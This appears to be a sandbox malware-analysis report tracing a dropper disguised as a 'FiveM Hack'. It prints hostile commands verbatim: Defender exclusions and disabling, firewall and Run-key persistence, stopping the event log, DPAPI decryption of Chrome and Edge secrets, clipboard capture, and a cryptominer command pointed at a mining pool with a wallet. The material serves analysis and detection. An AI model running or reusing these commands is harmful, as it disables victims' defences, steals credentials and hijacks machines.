PID 1556 wrote to memory of 2916	1556	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	87
PID 1556 wrote to memory of 2916	1556	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	87
PID 2916 wrote to memory of 5056	2916	Server.exe	94
PID 2916 wrote to memory of 5056	2916	Server.exe	94
PID 2916 wrote to memory of 5056	2916	Server.exe	94
PID 1556 wrote to memory of 2556	1556	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	95
PID 1556 wrote to memory of 2556	1556	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	95
PID 5056 wrote to memory of 4788	5056	Windows Defender.exe	98
PID 5056 wrote to memory of 4788	5056	Windows Defender.exe	98
PID 5056 wrote to memory of 4788	5056	Windows Defender.exe	98
PID 2588 wrote to memory of 4968	2588	cmd.exe	106
PID 2588 wrote to memory of 4968	2588	cmd.exe	106
PID 1556 wrote to memory of 3968	1556	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	113
PID 1556 wrote to memory of 3968	1556	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	113
PID 396 wrote to memory of 1712	396	dlpwxhhxvcgc.exe	119
PID 396 wrote to memory of 1712	396	dlpwxhhxvcgc.exe	119
PID 396 wrote to memory of 1712	396	dlpwxhhxvcgc.exe	119
PID 396 wrote to memory of 1712	396	dlpwxhhxvcgc.exe	119
PID 396 wrote to memory of 1712	396	dlpwxhhxvcgc.exe	119
PID 396 wrote to memory of 1712	396	dlpwxhhxvcgc.exe	119
PID 396 wrote to memory of 1712	396	dlpwxhhxvcgc.exe	119
PID 396 wrote to memory of 1712	396	dlpwxhhxvcgc.exe	119
PID 396 wrote to memory of 1712	396	dlpwxhhxvcgc.exe	119
PID 396 wrote to memory of 2920	396	dlpwxhhxvcgc.exe	121
PID 396 wrote to memory of 2920	396	dlpwxhhxvcgc.exe	121
PID 396 wrote to memory of 2920	396	dlpwxhhxvcgc.exe	121
PID 396 wrote to memory of 2920	396	dlpwxhhxvcgc.exe	121
PID 396 wrote to memory of 2920	396	dlpwxhhxvcgc.exe	121
PID 3732 wrote to memory of 528	3732	cmd.exe	122
PID 3732 wrote to memory of 528	3732	cmd.exe	122
PID 3968 wrote to memory of 4892	3968	FiveM.exe	125
PID 3968 wrote to memory of 4892	3968	FiveM.exe	125
PID 3968 wrote to memory of 4892	3968	FiveM.exe	125
PID 1556 wrote to memory of 3600	1556	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	126
PID 1556 wrote to memory of 3600	1556	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	126
PID 4892 wrote to memory of 392	4892	conhost.exe	128
PID 4892 wrote to memory of 392	4892	conhost.exe	128
PID 392 wrote to memory of 4288	392	cmd.exe	130
PID 392 wrote to memory of 4288	392	cmd.exe	130
PID 4892 wrote to memory of 4300	4892	conhost.exe	131
PID 4892 wrote to memory of 4300	4892	conhost.exe	131
PID 4300 wrote to memory of 396	4300	cmd.exe	133
PID 4300 wrote to memory of 396	4300	cmd.exe	133
PID 3600 wrote to memory of 736	3600	Rename_Z60IHLDjO6.exe	134
PID 3600 wrote to memory of 736	3600	Rename_Z60IHLDjO6.exe	134
PID 736 wrote to memory of 3428	736	cmd.exe	135
PID 736 wrote to memory of 3428	736	cmd.exe	135
PID 392 wrote to memory of 4192	392	cmd.exe	136
PID 392 wrote to memory of 4192	392	cmd.exe	136
PID 3428 wrote to memory of 2608	3428	powershell.exe	137
PID 3428 wrote to memory of 2608	3428	powershell.exe	137
PID 2608 wrote to memory of 4120	2608	csc.exe	138
PID 2608 wrote to memory of 4120	2608	csc.exe	138
PID 3600 wrote to memory of 1520	3600	Rename_Z60IHLDjO6.exe	139
PID 3600 wrote to memory of 1520	3600	Rename_Z60IHLDjO6.exe	139
PID 1520 wrote to memory of 1088	1520	cmd.exe	140
PID 1520 wrote to memory of 1088	1520	cmd.exe	140
PID 3600 wrote to memory of 1136	3600	Rename_Z60IHLDjO6.exe	141
PID 3600 wrote to memory of 1136	3600	Rename_Z60IHLDjO6.exe	141
PID 3600 wrote to memory of 548	3600	Rename_Z60IHLDjO6.exe	142
PID 3600 wrote to memory of 548	3600	Rename_Z60IHLDjO6.exe	142
PID 548 wrote to memory of 3260	548	cmd.exe	143
PID 548 wrote to memory of 3260	548	cmd.exe	143

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
"C:\Users\Admin\AppData\Local\Temp\461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1556
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Users\Admin\AppData\Roaming\Windows Defender.exe
    "C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5056
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Windows Defender.exe" "Windows Defender.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:4788
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:5008
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      PID:4992
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 0 -n 2
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2584
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2556
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2588
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4968
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "PVYZKASM"
    3⤵
    - Launches sc.exe
    PID:4804
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "PVYZKASM" binpath= "C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:840
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3000
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "PVYZKASM"
    3⤵
    - Launches sc.exe
    PID:2760
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3968
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4892
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:392
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4192
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4300
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:396
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      4⤵
      PID:1776
    - - C:\Users\Admin\AppData\Local\Temp\services64.exe
        
        C:\Users\Admin\AppData\Local\Temp\services64.exe
        5⤵
        Executes dropped EXE
        
        PID:4188
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        6⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:3916
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2236
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        
        PID:1008
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:2820
        
        C:\Windows\System32\svchost.exe
        
        C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=44tR22o4E8HYHFrMJeXruQYqEwLuXTGwiGHa2P5S6CPReNh6TC1z3p3HSC97upDwboECfSVrPD2LzGYortC66JuTFuvjMGb --pass=x --cpu-max-threads-hint=70 --cinit-kill-targets="" --tls --cinit-kill
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1748
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\89IoqGbzNZ.ps1""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\89IoqGbzNZ.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3428
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3rkcw1f\a3rkcw1f.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2608
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD1B7.tmp" "c:\Users\Admin\AppData\Local\Temp\a3rkcw1f\CSCBDBCA31C593E43A7A89686F993971B69.TMP"
        6⤵
        
        PID:4120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1136
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,156,9,238,141,154,184,70,172,236,248,219,118,49,221,129,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,116,252,111,91,152,150,244,38,203,28,185,78,103,77,16,101,194,148,157,169,49,156,167,142,17,66,169,99,94,27,192,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,108,223,233,11,31,208,177,65,28,2,119,99,150,148,82,167,30,46,66,30,88,242,93,184,211,112,6,101,197,193,213,210,48,0,0,0,50,185,14,153,159,53,227,119,194,227,152,131,231,21,248,221,125,0,88,8,112,1,188,88,206,176,41,50,59,182,79,145,5,133,195,34,114,180,187,153,31,59,180,20,74,62,101,192,64,0,0,0,2,108,52,0,24,87,161,53,122,16,57,209,161,190,231,19,110,232,20,164,145,169,124,218,110,27,87,235,236,138,46,99,32,129,70,209,134,138,198,38,81,93,169,186,210,158,10,35,34,58,158,149,85,140,48,79,186,156,216,53,137,126,30,160), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,156,9,238,141,154,184,70,172,236,248,219,118,49,221,129,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,116,252,111,91,152,150,244,38,203,28,185,78,103,77,16,101,194,148,157,169,49,156,167,142,17,66,169,99,94,27,192,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,108,223,233,11,31,208,177,65,28,2,119,99,150,148,82,167,30,46,66,30,88,242,93,184,211,112,6,101,197,193,213,210,48,0,0,0,50,185,14,153,159,53,227,119,194,227,152,131,231,21,248,221,125,0,88,8,112,1,188,88,206,176,41,50,59,182,79,145,5,133,195,34,114,180,187,153,31,59,180,20,74,62,101,192,64,0,0,0,2,108,52,0,24,87,161,53,122,16,57,209,161,190,231,19,110,232,20,164,145,169,124,218,110,27,87,235,236,138,46,99,32,129,70,209,134,138,198,38,81,93,169,186,210,158,10,35,34,58,158,149,85,140,48,79,186,156,216,53,137,126,30,160), $null, 'CurrentUser')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,156,9,238,141,154,184,70,172,236,248,219,118,49,221,129,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,148,158,239,4,97,176,34,229,137,241,212,173,146,140,183,103,97,108,31,154,124,52,88,119,81,217,225,21,67,253,66,52,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,247,18,229,249,249,244,124,202,128,242,184,216,75,158,24,206,62,175,241,235,107,105,35,106,88,66,214,183,231,220,106,238,48,0,0,0,192,86,120,219,201,238,146,113,217,78,67,169,31,198,19,167,10,125,226,1,25,99,110,55,209,3,229,154,173,187,228,81,32,37,240,245,150,169,61,160,91,13,41,203,7,49,231,121,64,0,0,0,120,117,126,61,12,222,141,252,40,13,35,0,154,83,151,3,80,193,99,54,198,229,93,244,128,85,1,237,71,230,17,199,35,7,31,225,53,126,245,132,181,109,1,137,89,80,216,169,208,205,1,18,221,232,68,63,10,135,73,129,173,229,254,211), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    PID:4816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,156,9,238,141,154,184,70,172,236,248,219,118,49,221,129,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,148,158,239,4,97,176,34,229,137,241,212,173,146,140,183,103,97,108,31,154,124,52,88,119,81,217,225,21,67,253,66,52,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,247,18,229,249,249,244,124,202,128,242,184,216,75,158,24,206,62,175,241,235,107,105,35,106,88,66,214,183,231,220,106,238,48,0,0,0,192,86,120,219,201,238,146,113,217,78,67,169,31,198,19,167,10,125,226,1,25,99,110,55,209,3,229,154,173,187,228,81,32,37,240,245,150,169,61,160,91,13,41,203,7,49,231,121,64,0,0,0,120,117,126,61,12,222,141,252,40,13,35,0,154,83,151,3,80,193,99,54,198,229,93,244,128,85,1,237,71,230,17,199,35,7,31,225,53,126,245,132,181,109,1,137,89,80,216,169,208,205,1,18,221,232,68,63,10,135,73,129,173,229,254,211), $null, 'CurrentUser')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    3⤵
    PID:3940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Rename_Z60IHLDjO6 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
    3⤵
    PID:3400
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Rename_Z60IHLDjO6 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
      4⤵
      Adds Run key to start application
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.A7Y45GuY8g""
    3⤵
    PID:3360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.A7Y45GuY8g"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
    3⤵
    PID:4544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    3⤵
    PID:1100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
    3⤵
    PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
    3⤵
    PID:4456
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_computersystemproduct get uuid
      4⤵
      PID:1776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
    3⤵
    PID:4068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Description,PNPDeviceID
      4⤵
      PID:4008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
    3⤵
    PID:5028
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic memorychip get serialnumber
      4⤵
      PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:2292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
    3⤵
    PID:4700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get processorid
      4⤵
      PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
    3⤵
    PID:3676
  - - C:\Windows\system32\getmac.exe
      getmac /NH
      4⤵
      PID:3028
- - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
    C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4308
  - - C:\Windows\Temp\{37D43771-8A81-4765-8BF4-ADFE6BF9700B}\.cr\python-installer.exe
      "C:\Windows\Temp\{37D43771-8A81-4765-8BF4-ADFE6BF9700B}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=560 -burn.filehandle.self=568 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
    3⤵
    PID:4192
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe"
  2⤵
  - Executes dropped EXE
  PID:4808
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe'"
      4⤵
      PID:4060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:2692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2896
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3492
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:1496
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:1512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:1088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:752
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4604
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:1692
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:5040
  - - C:\Windows\system32\cmd.exe
